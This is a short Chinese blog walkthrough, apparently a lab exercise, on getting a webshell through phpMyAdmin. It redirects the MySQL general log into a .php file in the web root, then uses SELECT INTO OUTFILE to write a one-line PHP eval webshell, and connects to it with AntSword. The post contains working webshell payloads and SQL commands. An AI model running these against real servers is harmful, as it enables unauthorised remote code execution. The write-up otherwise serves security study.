PhPMyadmin-cms漏洞复现

cr.sheeper2024-12-29 20:11

一.通过日志文件拿Shell

打开靶场连接数据库

来到sql中输入

复制代码

show global variables like '%general%';

复制代码

set global general_log='on'; //⽇志保存状态开启；

复制代码

set global general_log_file = 'D:/phpstudy/phpstudy_pro/WWW/123.php'  //修改日志保存位置

复制代码

show global variables like '%general%';

复制代码

select '<?php eval($_POST[cmd]);?>';

看看是否能连接成功

二.导入导出拿webshell

输入select @@datadir我们可以看到mysql路径

所以我们推测web路径为D:/phpstudy/phpstudy_pro/WWW

复制代码

select "<?php eval($_POST[a]);?>" into outfile 'D:/phpstudy/phpstudy_pro/WWW/666.php'

去访问

再用蚁剑连接一下试试

上一篇：PDF书籍《手写调用链监控APM系统-Java版》第5章插桩插件与bytebuddy字节码增强

下一篇：应用层2——FTP文件传输协议

热门推荐

012026年4月技术前沿：AI大模型爆发、智能体革命与量子安全新纪元 02GitHub 镜像站点 032026年4月AI大事件深度解读：大模型竞争进入“深水区“04近期有什么ai的新消息，新动态？ 2026.4月 052026 年 AI 编程助手全面对比评测：Cursor vs Copilot vs Claude Code vs GitHub Copilot Free 06codex app每次打开重连5次Reconnecting问题解决 07AI Weekly | 2026年4月第二周 · GitHub热门项目与AI发展趋势深度解析 08CC-Switch & Claude 基于 Linux 服务器安装使用指南 09从限购到畅通：GLM-5.1 Coding Plan接入攻略 10LLM Wiki：让大模型替你打理知识库的完整指南